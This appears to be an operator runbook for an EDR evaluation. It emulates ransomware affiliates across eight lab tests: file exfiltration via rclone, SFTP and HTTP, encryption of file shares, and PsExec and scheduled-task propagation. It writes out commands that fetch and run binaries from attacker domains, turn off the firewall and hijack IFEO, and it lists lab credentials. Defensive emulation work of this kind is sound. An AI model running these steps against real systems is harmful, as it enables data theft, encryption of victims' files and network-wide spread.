# Ransomware Protections Micros

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and run the following commands to start the C2 server for protections:

cd /opt/kalidev/evalsC2server
sudo go build -o controlServer main.go
sudo ./controlServer -c config/protections.yml

• ⚠️ Ensure that the C2 has started with the [Simple File Server] handler enabled.

Test 1 emulates ransomware affiliates enumerating via batch script and exfiltration of files of interest via rclone. The setup on the victim host for this test includes pre-positioning of a batch script on victim bts (10.222.25.61) in C:\Windows\Temp\test1.bat and opening an elevated Command Prompt as sonicbeats37.fm\yoona.

The test begins with execution of the batch script. The batch script will enumerate all user Desktop, Documents, and Downloads directories, create zips of files within the target directories, then exfiltrate the zips using rclone to the adversary server at m1sfir3d.blog (36.43.97.151). The batch script will sleep for 30 seconds in between zip creations and rclone exfiltrations.

The following noise activity is executed:

• User will execute curl to create CSV files
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB66_1_202310_Population,%20Surface%20Area%20and%20Density.csv
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB66_327_202310_International%20Migrants%20and%20Refugees.csv
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB61_253_Population%20Growth%20Rates%20in%20Urban%20areas%20and%20Capital%20cities.csv
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB66_230_202310_GDP%20and%20GDP%20Per%20Capita.csv"
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB66_153_202310_Gross%20Value%20Added%20by%20Economic%20Activity.csv
  • curl -O https://data.un.org/_Docs/SYB/CSV/SYB66_128_202310_Consumer%20Price%20Index.csv
• User will install Chrome
  • choco install googlechrome -y
• User will RDP from EXO to BLACKPINK

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab to setup the rclone server to receive the exfiltrated files:

  sudo rclone serve webdav /srv/http --addr 223.246.0.70:8080

• Ensure the Simple File Server handler is enabled and running

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP to bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

• Search for Command Prompt and right-click to Run As Administrator

• Download the batch script from the adversary server using curl

  curl --output "C:\Windows\Temp\test1.bat" http://m1sfir3d.blog/files/test1.bat

• Execute the batch script from your Administrative Command Prompt terminal.

  C:\Windows\Temp\test1.bat http://36.43.97.65

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• In the elevated Command Prompt withing the RDP to bts (10.222.25.61), download the cleanup script using curl.

  curl --output "C:\Windows\Temp\cleanup_test1.bat" http://m1sfir3d.blog/files/cleanup_test1.bat

• Execute the cleanup script.

  C:\Windows\Temp\cleanup_test1.bat

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 2 emulates a ransomware threat actor attempting to zip files and exfiltrate them via SFTP on a windows target. The setup includes pre-positioning an executable file on a victim host bts (10.222.25.61) at the location C:\Windows\Temp\test2.exe. A command prompt window will be opened as user yoona and the executable will be run without arguments.

The test begins with enumeration of all user directories inside of C:\Users\. Any Desktop, Documents, or Downloads directory will be zipped into individual zip archives. The executable will sleep for 15-30 seconds after each zip file creation.

After all of the zips have been created, the executable will establish a connection to the attacker-controlled SFTP server. Once established, the executable will upload each zip archive to the SFTP server, sleeping for 15-30 seconds after each upload has completed. Finally, the executable will output the list of uploaded files in the SFTP server.

The following noise activity is executed:

• User will execute rundll32.exe to load scripts
  • cmd.exe executed rundll32 url.dll,FileProtocolHandler https://www.google.com & taskkill /F /IM \"msedge.exe\" /T
• User will create text files using Notepad
  • notepad.exe creates C:\\Users\\Public\\hidden.txt" & "C:\\Users\\Public\\original.txt
• User will embed a text file within another text file
  • cmd.exe executed copy /b C:\\Users\\Public\\hidden.txt C:\\Users\\Public\\original.txt
• User will modify the IFEO registry for msedge
  • reg add \HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\msedge.exe\" /v Debugger /t REG_SZ /d \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\""

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and execute the following command to ensure that the SFTP server is running:

  sftp sftp_user@36.43.97.72

  Username	Password
  sftp_user	Password1!

• After successful authentication, run the following commands:

  pwd
  ls

If the server responds without error, the SFTP server is running correctly.

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

• Open an elevated command prompt and execute the following command to download the test binary from the attacker server:

  curl.exe --output "C:\Windows\Temp\test2.exe" http://d3fend-ev1l.radio/files/test2.exe

• Change directories to the directory containing the test2.exe binary.

  cd C:\Windows\Temp

• Execute the test binary.

test2.exe

After the executable has finished running, check that zip archives were uploaded to the SFTP server:

➡️ Switch to your Kali attacker machine and open a terminal tab.

• Run the following command to log into SFTP:

sftp sftp_user@36.43.97.72

• After successful authentication, run the following commands:

ls

If there are zip files present, the test completed successfully.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Run the following command to remove the created zip files from the victim host, and then check that there are no zip files left and the executable has been removed:

del *.zip
del test2.exe
dir

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 3 emulates a ransomware threat actor attempting to zip files in 1MB chunks and exfiltrate them via HTTP on a Linux target. The setup includes pre-positioning an executable file on a victim host lisa (10.222.25.65) at the location /tmp/test3. A terminal window will be opened as user user2 and the executable will be run without arguments.

The test begins with enumeration of all user directories inside of /home/. All files found in the Desktop, Documents, or Downloads directories will be zipped into zip archives up to 1MB.

After all of the zips have been created, the executable will upload each zip archive to the adversary server via HTTP POST requests.

The following noise activity is executed:

• User will execute commands
  • cmd.exe executed systeminfo | findstr /B /C:'System Locale'
  • cmd.exe executed netsh advfirewall set allprofiles state off
• User will execute powershell commands
  • Get-WmiObject -Class Win32_Service | Where-Object {{}$_.State -eq \"Running\"{}} | Format-Table
  • Stop-Service -Name Bluetooth{TAB}
  • Stop-Service -Name BTAGService
  • Stop-Service -Name OneSync{TAB}
  • Stop-Service -Name XblGameSave
  • Stop-Service -Name WbioSrvc
  • Get-WinSystemLocale
• User will RDP from EXO to ASIX

• Ensure the Simple File Server handler is enabled and running from your Kali attack host corsair (223.246.0.70)

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), open Powershell and SSH into the victim host lisa (10.222.25.65) as sonicbeats37.fm\sooyoung using the following command:

  ssh sooyoung@10.222.25.65

  Hostname	Username	Password
  lisa.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Execute the following command in your terminal to download the test binary from the attacker server:

  curl --output "/tmp/test3" http://c4sh-m0n33y.fr/files/test3

• Change directories to the directory containing the test3 binary.

  cd /tmp

• Change the binary to be executable

  chmod +x test3

• Execute the test binary.

  ./test3

• Check the control server log to ensure that the zip archives were uploaded to the attack host.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• From the /tmp/ directory, run the following command to remove the created zip files and executable from the victim host, and check that everything has been successfully removed.

  rm archive*
  rm test3
  ls

• Terminate the controlServer via 'ctrl+c' from your Kali machine

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 4 emulates a ransomware threat actor attempting to encrypt files on a remote windows file server using a PowerShell script. The setup includes copying the contents of a PowerShell script from a non-victim browser. A PowerShell window will be opened as user yoona. The script will be executed with the appropriate arguments targeting the mounted drive of the managed remote file server.

The test begins with enumeration of all files and directories inside of Z:\ using Get-ChildItem. After all files have been enumerated, they will all be encrypted using an encryption key generated by the test4 application. Target files will be overwritten by the corresponding encrypted contents.

The following noise activity is executed:

• User will execute following commands in PowerShell:
  • Get-ChildItem
  • Set-Location -Path C:\\Users\\Public\\
  • New-Item -ItemType File -Name new_readme_report.txt
  • Remove-Item new_readme_report.txt

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

• Search for and open PowerShell

• ➡️ In a Browser on a non-victim machine, browse to test4.ps1 and copy the script contents.

• ➡️ Return to the RDP to bts (10.222.25.61). Paste the test4.ps1 content into the PowerShell window and press enter.

• Execute the test with the target file path.

Execute-Test -action encrypt -startFolder Z:\

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Rerun the the test4 script with the decrypt action.

Execute-Test -action decrypt -startFolder Z:\ -key [KEY GENERATED DURING ENCRYPTION]

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 5 emulates a ransomware threat actor attempting to encrypt files on a remote windows file server using third party libraries and Windows API's. The setup includes pre-positioning an executable file on an unmanaged victim host eyescream (199.88.44.201) at the location C:\Windows\Temp\test5.exe. A command prompt window will be opened as user yoona. The executable will be executed with the argument Z:\ targeting the mounted drive of the managed remote file server.

The test begins with enumeration of all files and directories inside of Z:\. Any file that is deemed not a system file, sym-link, or directory will be added to a file list. After all files have been enumerated, they will all be encrypted using an encryption key generated by the test5 application. The executable will sleep for 250-1000 milliseconds after each file is encrypted.

The following noise activity is executed: Execute this section prior to Setup. Any blocks that occur during this section will be considered for False Positive measurement.

• From the Windows jumpbox spitfire (223.246.0.90), search for Command Prompt then right-click to Run as Administrator if not already running

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP to eyescream (199.88.44.201) as devadmin | Hostname | Username | Password | | -------- | -------- | -------- | | eyescream | devadmin | DevPass123! |

• Search for Command Prompt and right-click to Run as Administrator

• Check that the share is mounted, otherwise, mount it

  net use

  • If the Z: is not mounted to asix (10.222.15.15), mount the share and enter the password when prompted:

    net use Z: \\10.222.15.15\D$\data /persistent:yes /user:sonicbeats37.fm\sooyoung

    Password
    Dental-Crew

• Install 7zip:

  choco install 7zip -y

• Zip the files in the share's Documents folder:

  7z a Z:\transition_off_share.zip Z:\Documents\ -p!Evals123

• Move the zip from the Documents folder to the Desktop of eyescream (199.88.44.201)

  move Z:\transition_off_share.zip C:\users\op1\Desktop

• Delete the share's Documents folder

  rmdir /S /Q Z:\Documents\

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host eyescream (199.88.44.201) as op1 if not already connected.

• Search for and open Command Prompt

• Execute the following command to transfer the file to the victim host:

  curl --output "C:\Windows\Temp\test5.exe" http://223.246.0.70/files/test5.exe

• Change directories to the directory containing the test5.exe binary.

  cd C:\Windows\Temp

• Execute the following command to ensure the Z: network drive is mapped:

  net use

  • If the Z: is not mounted to asix (10.222.15.15), mount the share and enter the password when prompted:

    net use Z: \\10.222.15.15\D$\data /persistent:yes /user:sonicbeats37.fm\sooyoung Dental-Crew

• Execute the test binary with the target file path.

C:\Windows\Temp\test5.exe Z:\ encrypt

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Rerun the the test5 application with the decrypt argument and unmount the file share.

C:\Windows\Temp\test5.exe Z:\ decrypt
net use Z: /delete

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 6 emulates a ransomware threat actor attempting to encrypt files on a Linux file system using OpenSSL in a bash script. The setup includes pre-positioning a bash file on victim host lisa (10.222.25.65) at the location /tmp/test6.sh. The script will be executed with the argument /home.

Once the script is executed it will begin enumerating all files and directories inside of /home. Any file that is deemed not a directory will be encrypted using an encryption key generated with OpenSSL inside the test6 bash script.

The following noise activity is executed:

• User will execute chocolatey to install profwiz and ldapadmin
  • choco install profwiz -y
  • choco install ldapadmin -y
• User will RDP from BLACKPINK to EXO

• From your Kali attack host corsair (223.246.0.70), open a new terminal tab and execute the following command to transfer the file to the victim host:

  scp /opt/kalidev/LockBit/Resources/payloads/test6.sh sooyoung@10.222.25.65:/tmp/

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), open Powershell and SSH into the victim host lisa (10.222.25.65) as sonicbeats37.fm\sooyoung using the following command:

  ssh sooyoung@10.222.25.65

  Hostname	Username	Password
  lisa.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Adjust the bash script permissions to allow the script to execute:

  chmod +x /tmp/test6.sh

• Execute the test bash script with the target file path.

sudo /tmp/test6.sh /home

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• No cleanup available for Test 6. Reset lisa (10.222.25.65) if needed.

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 7 emulates a threat actor that uses NetBIOS scans and PsExec to propagate across Windows devices in a network.

The test setup includes pre-positioning an executable file on a Windows workstation bts (10.222.25.61) at the location C:\Windows\Temp\test7.exe. A command prompt window will be opened as domain admin sooyoung. The executable will be executed with no arguments and will log activity to test7.log in the current working directory.

The test begins with discovering which local networks the workstation is on and scanning those networks with NetBIOS lookups to see which IP addresses respond as Windows machines. Upon having discovered at least one Windows target, the test binary will drop an embedded PsExec binary to disk at C:\Windows\Temp\pm.exe and run it to copy itself and execute itself on each target. The propagated processes will attempt to run as the SYSTEM user.

The following noise activity is executed: Execute this section prior to Setup. Any blocks that occur during this section will be considered for False Positive measurement.

• ➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP to blackpink (10.222.15.10) as sonicbeats37.fm\sooyoung if not already connected | Hostname | Username | Password | | -------- | -------- | -------- | | blackpink.sonicbeats37.fm | sonicbeats37.fm\sooyoung | Dental-Crew |

• Search for PowerShell then right-click to Run as Administrator

• Open Notepad and save the following to the Desktop as install_software.bat (save your file with type "All Files (.)" to ensure your .bat extension is saved correctly):

  choco install -y notepadplusplus
  choco install -y adobereader

• From PowerShell, execute the batch script using PsExec against the workstations in the range:

  psh

  $computers="10.222.25.61","10.222.25.62";
  foreach ($computer in $computers){
  psexec \\$computer -s -u sonicbeats37.fm\sooyoung -p Dental-Crew -c "C:\users\sooyoung\Desktop\install_software.bat";
  }

➡️ From the Windows jumpbox spitfire (223.246.0.90), RDP into the victim host bts (10.222.25.61) as sonicbeats37.fm\sooyoung.

• Search for Command Prompt and right-click to Run As Administrator then execute the following command to download the test binary from the attacker server:

curl.exe --output "C:\Windows\Temp\test7.exe" http://off1ce-p4p4r.co.uk/files/test7.exe

• In the Command Prompt window, change directories to the directory containing the test7.exe binary.

cd C:\Windows\Temp

• Execute the test binary

C:\Windows\Temp\test7.exe

• If the command prompt window remains open, look through the terminal output to confirm that NetBIOS scanning found at least 1 target and that PsExec was successfully dropped and executed against the target hosts.

• If the EDR tooling closes the command prompt window as part of its blocking process, open a PowerShell terminal and run the following command to view the log file and determine how far the test binary got prior to the block:

type C:\Windows\Temp\test7.log

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Open an elevated PowerShell prompt on workstation and execute the following:

rm -force C:\windows\temp\test7.exe
rm -force C:\Windows\temp\pm.exe
Invoke-Command -Computer exo -Scriptblock {
    rm -force C:\Windows\test7.exe;
}

ℹ️ NOTE: Only the techniques under test are listed in this table

Test 8 emulates a threat actor that uses remote scheduled tasks to propagate from a file server to hosts that are connected to the file server's shares.

The test setup includes pre-positioning an executable file on a file server asix (10.222.15.15) at the location C:\Windows\Temp\test8.exe. A command prompt window will be opened as domain admin user sooyoung. The executable will be executed with no arguments and will log activity to test8.log in the current working directory.

The test begins with enumeration of all hosts that have a connected network session to the file server. For each discovered host, the test binary will copy itself to the C:\Windows\System32 folder of the remote host and then create a scheduled task \Microsoft\Windows\Net Session File Management Task on the remote host. The created task will automatically execute 15 seconds after being registered.

The following noise activity is executed:

• User will map a network drive to a remote SMB share
• User will copy files from the mapped network drive to local directory
• User will disconnect from the mapped network drive
• User will clear the recycling bin

• ➡️ RDP into the victim workstation bts (10.222.25.61) as sonicbeats37.fm\yoona if not already connected.

  Hostname	Username	Password
  bts.sonicbeats37.fm	sonicbeats37.fm\yoona	Exposed-Backpack

  ⭕ Disconnect (do not sign out) from bts (10.222.25.61)

• ➡️ RDP into the victim workstation exo (10.222.25.62) as sonicbeats37.fm\sunny.

  Hostname	Username	Password
  exo.sonicbeats37.fm	sonicbeats37.fm\sunny	Angular-Porch

  ⭕ Disconnect (do not sign out) from exo (10.222.25.62)

• ➡️ RDP into the domain controller blackpink (10.222.15.10) as sonicbeats37.fm\sooyoung.

  Hostname	Username	Password
  blackpink.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

  ⭕ Disconnect (do not sign out) from blackpink (10.222.15.10)

• ➡️ RDP into the victim file server asix (10.222.15.15) as sonicbeats37.fm\sooyoung.

  Hostname	Username	Password
  asix.sonicbeats37.fm	sonicbeats37.fm\sooyoung	Dental-Crew

• Open an elevated command prompt and execute the following command to download the test binary from the attacker server:

  curl.exe --output "C:\Windows\Temp\test8.exe" http://p1nk-p3ncil.net/files/test8.exe

• Change directories to the directory containing the test8.exe binary.

  cd C:\Windows\Temp

• Execute the test binary

C:\Windows\Temp\test8.exe

• If the command prompt window remains open, look through the log messages to confirm that host enumeration, remote file copies, and remote scheduled task creation were successful.

• 📷 Screenshot the end state of the test and any command/application output (If a block occurred screenshot any alert/prompt).

• Open an elevated PowerShell prompt on the file server and execute the following:

rm -force C:\Windows\Temp\test8.exe
Invoke-Command -Computer bts,exo,blackpink -Scriptblock {
    schtasks /delete /TN "\Microsoft\Windows\Net Session File Management Task" /F;
    rm -force C:\Windows\System32\test8.exe;
}

ℹ️ NOTE: Only the techniques under test are listed in this table